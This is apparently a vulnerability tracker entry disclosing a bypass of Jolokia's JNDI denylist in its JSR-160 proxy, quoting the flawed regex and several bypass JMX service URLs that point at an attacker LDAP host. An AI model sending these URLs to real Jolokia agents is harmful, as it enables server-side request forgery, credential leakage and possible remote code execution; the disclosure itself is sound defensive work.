Bug 2526752 (CVE-2026-84218)

Summary: CVE-2026-84218 org.jolokia/jolokia-core: Incomplete JNDI Denylist in Jolokia JSR-160 Proxy (Bypass of CVE-2018-1000130 Fix)
Product: [Other] Security Response Reporter: OSIDB Bzimport <bzimport>
Component: vulnerabilityAssignee: Product Security <prodsec-ir-bot>
Status: NEW --- QA Contact:
Severity: high Docs Contact:
Priority: high    
Version: unspecifiedCC: anthomas, ataylor, dbruscin, ehelms, ehugonne, fmariani, fmongiar, ggainey, gmalinko, janstey, jnethert, jpasqual, juwatts, jwon, kvanderr, mcarlett, mdellweg, mhulan, nmoumoul, osousa, pcreech, pdelbell, pjindal, rchan, rstepani, smallamp, tcunning, tmalecek, yfang
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: Doc Type: ---
Doc Text:
A flaw was found in Jolokia's JSR-160 proxy functionality where insufficient validation of client-controlled JMX service URLs allows a bypass of the denylist introduced to mitigate CVE-2018-1000130. The proxy accepts a `target.url` value from a Jolokia POST request and passes it to `JMXServiceURL` and `JMXConnectorFactory` for establishing the remote JMX connection. The existing denylist only rejects URLs matching `service:jmx:rmi:///jndi/ldap:.*`, which can be bypassed using alternative valid JMX service URL forms, including `ldaps://` schemes or LDAP URLs with a non-empty JMX host component. These URLs are accepted as valid `JMXServiceURL` objects and can cause the Jolokia agent JVM to perform a JNDI lookup against an attacker-controlled LDAP endpoint. This can result in server-side request forgery (SSRF), forwarding of supplied JMX credentials to the remote endpoint, and potentially remote code execution depending on the classes and configuration available in the target JVM.
Story Points: ---
Clone Of: Environment:
Last Closed: Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:

Description OSIDB Bzimport 2026-09-01 12:34:16 UTC
Jolokia's JSR-160 proxy mode accepts a client-supplied JMX service URL
(target.url in a POST body) and connects to it using
JMXConnectorFactory. The fix for CVE-2018-1000130 (Jolokia 1.5.0,
2018) added a default denylist to block LDAP-based JNDI injection. That
denylist consists of a single regular expression, which remains identical
on both the 1.x and 2.x branches as of this writing:

service:jmx:rmi:///jndi/ldap:.*

Matching is performed as a full-string regex match
(Pattern.compile(pattern, CASE_INSENSITIVE).matcher(url).matches()).

This pattern is incomplete. At least three classes of LDAP JNDI URLs
pass through the filter:

Bypass 1 -- ldaps:// scheme:
The pattern requires the literal substring ldap: immediately after
/jndi/. The LDAP-over-TLS scheme ldaps: does not match.

    Bypassing URL: service:jmx:rmi:///jndi/ldaps://attacker:1389/o=ref

Bypass 2 -- Non-empty JMX host in the service URL:
The pattern is anchored to service:jmx:rmi:///jndi/... (three slashes,
meaning the JMX host component is empty). A JMX service URL with a
non-empty host such as service:jmx:rmi://localhost/jndi/ldap://... is
a valid JMXServiceURL whose path is still /jndi/ldap://..., but
the full string does not match the regex.

    Bypassing URL: service:jmx:rmi://localhost/jndi/ldap://attacker:1389/o=ref
    Bypassing URL: service:jmx:rmi://127.0.0.1:0/jndi/ldap://attacker:1389/o=ref

All three bypass URLs parse into valid JMXServiceURL objects and, when
passed to JMXConnectorFactory.newJMXConnector().connect(), trigger a
JNDI lookup against the attacker-controlled endpoint.

Upstream Issue: https://github.com/jolokia/jolokia/issues/1049